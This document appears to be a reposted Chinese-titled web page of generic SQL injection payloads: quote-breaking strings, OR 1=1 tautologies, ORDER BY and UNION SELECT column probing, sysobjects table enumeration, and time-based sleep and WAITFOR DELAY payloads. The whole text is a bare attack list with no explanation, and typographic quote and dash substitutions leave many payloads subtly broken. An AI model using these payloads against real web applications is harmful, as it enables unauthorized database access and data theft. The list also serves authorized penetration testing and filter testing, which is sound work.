通用SQL注入Payloads

# 通用SQL注入Payloads

> 原文：[https://www.zhihuifly.com/t/topic/3530](https://www.zhihuifly.com/t/topic/3530)

# 通用SQL注入Payloads

“`
‘
”
`
“
,
”
“”
/
//
\
\\
;
‘ or ”
— or #
‘ OR ‘1
‘ OR 1 — –
” OR “” = ”
” OR 1 = 1 — –
‘ OR ” = ‘
‘=’
‘LIKE’
‘=0–+
OR 1=1
‘ OR ‘x’=’x
‘ AND id IS NULL; —
””””””’UNION SELECT ‘2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator

@variable local variable

@@variable global variable

# Numeric

AND 1

AND 0

AND true

AND false

1-false

1-true

1*56

-2

1’ ORDER BY 1–+

1’ ORDER BY 2–+

1’ ORDER BY 3–+

1’ ORDER BY 1,2–+

1’ ORDER BY 1,2,3–+

1’ GROUP BY 1,2,–+

1’ GROUP BY 1,2,3–+

’ GROUP BY columnnames having 1=1 –

-1’ UNION SELECT 1,2,3–+

’ UNION SELECT sum(columnname ) from tablename –

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

’ AND MID(VERSION(),1,1) = ‘5’;

’ and 1 in (select min(name) from sysobjects where xtype = ‘U’ and name > ‘.’) –

Finding the table name

Time-Based:

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

‘;WAITFOR DELAY ‘0:0:30’–

Comments:

# Hash comment `/* C-style comment

– – SQL comment

;%00 Nullbyte

` Backtick`
“`